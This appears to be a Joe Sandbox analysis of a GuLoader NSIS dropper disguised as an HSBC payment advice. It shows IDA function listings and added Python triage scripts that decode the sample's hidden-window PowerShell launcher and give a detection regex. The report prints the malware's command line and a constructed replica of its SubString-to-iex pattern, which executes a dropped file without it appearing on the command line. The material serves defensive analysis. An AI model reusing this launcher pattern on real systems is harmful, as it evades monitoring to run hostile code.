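    i = data.find(NSIS_MAGIC)
    while i != -1:
        yield i
        i = data.find(NSIS_MAGIC, i + 1)


def find_nsis_firstheader(data: bytes, aligned: bool = True):
    """Return a dict describing the first NSIS header found, or None.

    aligned=True mirrors the stub: only 512-byte block boundaries are tested.
    aligned=False searches the magic anywhere (useful when the stub's padding
    was altered) and backs up 8 bytes over flags + siginfo.
    """
    if aligned:
        candidates = range(0, len(data), SCAN_STEP)
    else:
        candidates = (i - 8 for i in _magic_positions(data) if i >= 8)
    for off in candidates:
        if off + FIRSTHEADER.size > len(data):
            continue
        flags, sig, magic, header_len, following = FIRSTHEADER.unpack_from(data, off)
        if sig == NSIS_SIG and magic == NSIS_MAGIC:
            return {
                "offset": off,
                "flags": decode_flags(flags),
                "header_len": header_len,
                "following_len": following,
            }
    return None


def make_constructed_sample(header_offset: int = 1024, flags: int = 0) -> bytes:
    """Build a fake installer image: 'MZ' stub padding, the firstheader, then filler.

    Constructed input for the example; a real NSIS stub is several KiB of code
    before the header, but only the alignment matters for the scan.
    """
    hdr = FIRSTHEADER.pack(flags, NSIS_SIG, NSIS_MAGIC, 0x1234, 0x5678)
    return b"MZ" + b"\0" * (header_offset - 2) + hdr + b"\xAA" * 64


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_constructed_sample()
    print(find_nsis_firstheader(blob) or find_nsis_firstheader(blob, aligned=False))
```

          Run it against the dropped sample (`python nsis_hdr.py sample.exe`) to confirm the container type before spending time on the stub's own code; a hit at a 512-aligned offset with plausible length fields says the rest of the Win32 functions on this page are stock NSIS and the interesting logic lives in the extracted files, not in the stub.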

          Control-flow Graph

          control_flow_graph 472 401752-401777 call 402b38 call 4059aa 477 401781-401793 call 405ee8 call 405933 lstrcatW 472->477 478 401779-40177f call 405ee8 472->478 483 401798-401799 call 40617c 477->483 478->483 487 40179e-4017a2 483->487 488 4017a4-4017ae call 40622b 487->488 489 4017d5-4017d8 487->489 496 4017c0-4017d2 488->496 497 4017b0-4017be CompareFileTime 488->497 490 4017e0-4017fc call 405b54 489->490 491 4017da-4017db call 405b2f 489->491 499 401870-401899 call 405192 call 403060 490->499 500 4017fe-401801 490->500 491->490 496->489 497->496 512 4018a1-4018ad SetFileTime 499->512 513 40189b-40189f 499->513 501 401852-40185c call 405192 500->501 502 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 500->502 514 401865-40186b 501->514 502->487 534 401847-401848 502->534 516 4018b3-4018be CloseHandle 512->516 513->512 513->516 517 4029ce 514->517 519 4018c4-4018c7 516->519 520 4029c5-4029c8 516->520 521 4029d0-4029d4 517->521 524 4018c9-4018da call 405f0a lstrcatW 519->524 525 4018dc-4018df call 405f0a 519->525 520->517 531 4018e4-402241 call 4056c4 524->531 525->531 531->520 531->521 534->514 536 40184a-40184b 534->536 536->501
          APIs
          • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,?,?,00000031), ref: 00401793
          • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,00000000,00000000,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,?,?,00000031), ref: 004017B8
            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
            • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
            • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
            • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
          • String ID: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$truckled\Spaanskraberne198
          • API String ID: 1941528284-46577786
          • Opcode ID: ba9f977b933b7daf26b5bee7017ad8d3f61f37f96f31ec80bfe8d25e1f203dfd
          • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
          • Opcode Fuzzy Hash: ba9f977b933b7daf26b5bee7017ad8d3f61f37f96f31ec80bfe8d25e1f203dfd
          • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
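
          The launcher command line this function assembles (lstrcatW at 0x401793) is cut off in the report's string table after the dropped directory. In this GuLoader NSIS family the command continues with a .SubString(offset, length) call that lifts a short cmdlet name out of the dropped text file and a call operator that invokes it on the whole file content, so the PowerShell process never receives the script on its own command line. The script below is an added triage example, not the sample's code and not Joe Sandbox output: the command line, the stage path and the stage text are constructed to match the pattern (hypothetical names and a small offset), and cp1252 is assumed as the ANSI code page that Windows PowerShell 5.1 uses for Get-Content when the file carries no BOM.

```python
"""Decode the PowerShell launcher pattern seen in this NSIS sample.

Added example for this report. The command line, path and stage file are
constructed to match the pattern (not the sample's real files), and cp1252
is assumed as the ANSI code page Windows PowerShell 5.1 uses for
Get-Content without a BOM.
"""
import codecs
import re

# Constructed stage file: filler text with the cmdlet name buried in it,
# as the dropped file does at a much larger offset.
STAGE_TEXT = (
    "# constructed stage file: filler text around the cmdlet name\n"
    "$Frokostpausens = 'Indkoebsliste';\n"
    "# ... a real stage hides the token behind tens of kilobytes of this ...\n"
    "$Vaerktoej = 'Laangsamme iex Hastigheder';\n"
    "Write-Output 'second-stage logic would follow here'\n"
)
STAGE_BYTES = STAGE_TEXT.encode("cp1252")                        # as written to disk, no BOM
STAGE_PATH = r"C:\Users\user\AppData\Roaming\example\stage.txt"  # hypothetical path
CMDLINE = (
    '"powershell.exe" -windowstyle hidden "'
    f"$Content=Get-Content -raw '{STAGE_PATH}';"
    f"$Name=$Content.SubString({STAGE_TEXT.index('iex')},3);"
    '.$Name($Content) "'
)

# $var=Get-Content -raw '<path>';$tok=$var.SubString(<off>,<len>);.$tok($var)
LAUNCHER_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*Get-Content\s+-raw\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<tok>\w+)\s*=\s*\$(?P=var)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;\s*"
    r"[.&]\s*\$(?P=tok)\s*\(\s*\$(?P=var)\s*\)",
    re.IGNORECASE,
)
SCRIPT_RUNNERS = {"iex", "invoke-expression"}


def parse_launcher(cmdline: str):
    """Pull the stage path, substring offset/length and hidden-window flag out of the launcher."""
    m = LAUNCHER_RE.search(cmdline)
    if m is None:
        return None
    return {
        "path": m["path"],
        "offset": int(m["off"]),
        "length": int(m["len"]),
        "hidden": "-windowstyle hidden" in cmdline.lower(),
    }


def decode_stage(raw: bytes) -> str:
    """Decode the stage file the way Get-Content does, so .NET char offsets line up.

    SubString indexes UTF-16 chars, not bytes: a BOM selects the codec, otherwise
    Windows PowerShell 5.1 falls back to the ANSI code page (cp1252 assumed here).
    Decoding with the wrong codec, or slicing the raw bytes, lands on the wrong token
    as soon as the filler contains a non-ASCII character.
    """
    if raw.startswith(codecs.BOM_UTF8):
        return raw[len(codecs.BOM_UTF8):].decode("utf-8")
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return raw.decode("utf-16")
    return raw.decode("cp1252", errors="replace")


def resolve_stage(cmdline: str, raw_stage: bytes):
    """Recover the command the call operator will run and whether it executes the file as code."""
    info = parse_launcher(cmdline)
    if info is None:
        return None
    text = decode_stage(raw_stage)
    name = text[info["offset"]: info["offset"] + info["length"]]
    info["cmdlet"] = name
    info["executes_stage"] = name.lower() in SCRIPT_RUNNERS
    return info


if __name__ == "__main__":
    print(resolve_stage(CMDLINE, STAGE_BYTES))
```

          For incident response the value is twofold: `parse_launcher` gives a process-creation rule (hidden window, Get-Content -raw, SubString, call operator) that does not depend on the randomised Danish identifiers, and `resolve_stage` tells you from the dropped file alone whether the whole file is about to be run through Invoke-Expression, which is where the process-hollowing stage reported on this page originates.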

          Control-flow Graph

          control_flow_graph 538 405192-4051a7 539 4051ad-4051be 538->539 540 40525e-405262 538->540 541 4051c0-4051c4 call 405f0a 539->541 542 4051c9-4051d5 lstrlenW 539->542 541->542 544 4051f2-4051f6 542->544 545 4051d7-4051e7 lstrlenW 542->545 547 405205-405209 544->547 548 4051f8-4051ff SetWindowTextW 544->548 545->540 546 4051e9-4051ed lstrcatW 545->546 546->544 549 40520b-40524d SendMessageW * 3 547->549 550 40524f-405251 547->550 548->547 549->550 550->540 551 405253-405256 550->551 551->540
          APIs
          • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
          • lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
          • lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
          • SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$lstrlen$TextWindowlstrcat
          • String ID: Completed
          • API String ID: 2531174081-3087654605
          • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
          • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
          • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
          • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

          Control-flow Graph

          control_flow_graph 552 40317b-4031a4 GetTickCount 553 4032e5-4032ed call 402d18 552->553 554 4031aa-4031d5 call 40330d SetFilePointer 552->554 559 4032ef-4032f4 553->559 560 4031da-4031ec 554->560 561 4031f0-4031fe call 4032f7 560->561 562 4031ee 560->562 565 403204-403210 561->565 566 4032d7-4032da 561->566 562->561 567 403216-40321c 565->567 566->559 568 403247-403263 call 40638e 567->568 569 40321e-403224 567->569 574 4032e0 568->574 575 403265-40326d 568->575 569->568 570 403226-403246 call 402d18 569->570 570->568 579 4032e2-4032e3 574->579 577 4032a1-4032a7 575->577 578 40326f-403285 WriteFile 575->578 577->574 582 4032a9-4032ab 577->582 580 403287-40328b 578->580 581 4032dc-4032de 578->581 579->559 580->581 583 40328d-403299 580->583 581->579 582->574 584 4032ad-4032c0 582->584 583->567 585 40329f 583->585 584->560 586 4032c6-4032d5 SetFilePointer 584->586 585->584 586->553
          APIs
          • GetTickCount.KERNEL32 ref: 00403190
            • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
          • WriteFile.KERNELBASE(0040BE78,00412011,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
          • SetFilePointer.KERNELBASE(0023CDF4,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$Pointer$CountTickWrite
          • String ID: x>A
          • API String ID: 2146148272-3854404225
          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
          • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
          • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

          Control-flow Graph

          control_flow_graph 587 4015b9-4015cd call 402b38 call 4059de 592 401614-401617 587->592 593 4015cf-4015eb call 405960 CreateDirectoryW 587->593 594 401646-402195 call 401423 592->594 595 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 592->595 602 40160a-401612 593->602 603 4015ed-4015f8 GetLastError 593->603 608 4029c5-4029d4 594->608 595->608 610 40163e-401641 595->610 602->592 602->593 606 401607 603->606 607 4015fa-401605 GetFileAttributesW 603->607 606->602 607->602 607->606 610->608
          APIs
            • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,76702EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 004059EC
            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,?,00000000,000000F0), ref: 00401630
          Strings
          • C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion, xrefs: 00401623
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
          • String ID: C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion
          • API String ID: 3751793516-1482619193
          • Opcode ID: b06b06725131e5471f0a94c6893011cfa6e633a44e63598bf1a8582287d2e863
          • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
          • Opcode Fuzzy Hash: b06b06725131e5471f0a94c6893011cfa6e633a44e63598bf1a8582287d2e863
          • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

          Control-flow Graph

          control_flow_graph 613 403060-40306e 614 403070-403086 SetFilePointer 613->614 615 40308c-403095 call 40317b 613->615 614->615 618 403175-403178 615->618 619 40309b-4030ae call 405bd7 615->619 622 403161 619->622 623 4030b4-4030c8 call 40317b 619->623 625 403163-403164 622->625 623->618 627 4030ce-4030d1 623->627 625->618 628 4030d3-4030d6 627->628 629 40313d-403143 627->629 632 403172 628->632 633 4030dc 628->633 630 403145 629->630 631 403148-40315f ReadFile 629->631 630->631 631->622 634 403166-40316f 631->634 632->618 635 4030e1-4030eb 633->635 634->632 636 4030f2-403104 call 405bd7 635->636 637 4030ed 635->637 636->622 640 403106-40311b WriteFile 636->640 637->636 641 403139-40313b 640->641 642 40311d-403120 640->642 641->625 642->641 643 403122-403135 642->643 643->635 644 403137 643->644 644->632
          APIs
          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
          • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$PointerWrite
          • String ID: x>A
          • API String ID: 539440098-3854404225
          • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
          • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
          • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
          • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

          Control-flow Graph

          control_flow_graph 645 405b83-405b8f 646 405b90-405bc4 GetTickCount GetTempFileNameW 645->646 647 405bd3-405bd5 646->647 648 405bc6-405bc8 646->648 650 405bcd-405bd0 647->650 648->646 649 405bca 648->649 649->650
          APIs
          • GetTickCount.KERNEL32 ref: 00405BA1
          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CountFileNameTempTick
          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
          • API String ID: 1716503409-944333549
          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
          • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
          • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 651 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 658 4029c5-4029d4 651->658 659 40237b-402383 651->659 660 402385-402392 call 402b38 lstrlenW 659->660 661 402396-402399 659->661 660->661 664 4023a9-4023ac 661->664 665 40239b-4023a8 call 402b1b 661->665 669 4023bd-4023d1 RegSetValueExW 664->669 670 4023ae-4023b8 call 403060 664->670 665->664 673 4023d3 669->673 674 4023d6-4024b0 RegCloseKey 669->674 670->669 673->674 674->658 676 402791-402798 674->676 676->658
          APIs
          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
          • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
          • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
          • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseCreateValuelstrlen
          • String ID:
          • API String ID: 1356686001-0
          • Opcode ID: 3d1039a2ea90bcf073f2e723334542c8609e3331be1057863197d0e9620388c6
          • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
          • Opcode Fuzzy Hash: 3d1039a2ea90bcf073f2e723334542c8609e3331be1057863197d0e9620388c6
          • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 677 401e51-401e62 call 402b38 call 405192 call 405663 683 401e67-401e6c 677->683 684 402791-402798 683->684 685 401e72-401e75 683->685 686 4029c5-4029d4 684->686 687 401ec6-401ecf CloseHandle 685->687 688 401e77-401e87 WaitForSingleObject 685->688 687->686 690 401e97-401e99 688->690 691 401e89-401e95 call 40628b WaitForSingleObject 690->691 692 401e9b-401eab GetExitCodeProcess 690->692 691->690 694 401eba-401ebd 692->694 695 401ead-401eb8 call 405e2f 692->695 694->687 698 401ebf 694->698 695->687 698->687
          APIs
            • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
            • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
            • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
            • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
            • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
          • String ID:
          • API String ID: 3585118688-0
          • Opcode ID: 86a9737d06a492ba168b449a6a0e56dd891bc5485ac101adf7b243a53387483d
          • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
          • Opcode Fuzzy Hash: 86a9737d06a492ba168b449a6a0e56dd891bc5485ac101adf7b243a53387483d
          • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
          APIs
          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
          • CloseHandle.KERNEL32(?), ref: 00405695
          Strings
          • Error launching installer, xrefs: 00405676
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseCreateHandleProcess
          • String ID: Error launching installer
          • API String ID: 3712363035-66219284
          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
          • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
          • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
          APIs
            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061DF
            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061F3
            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00406206
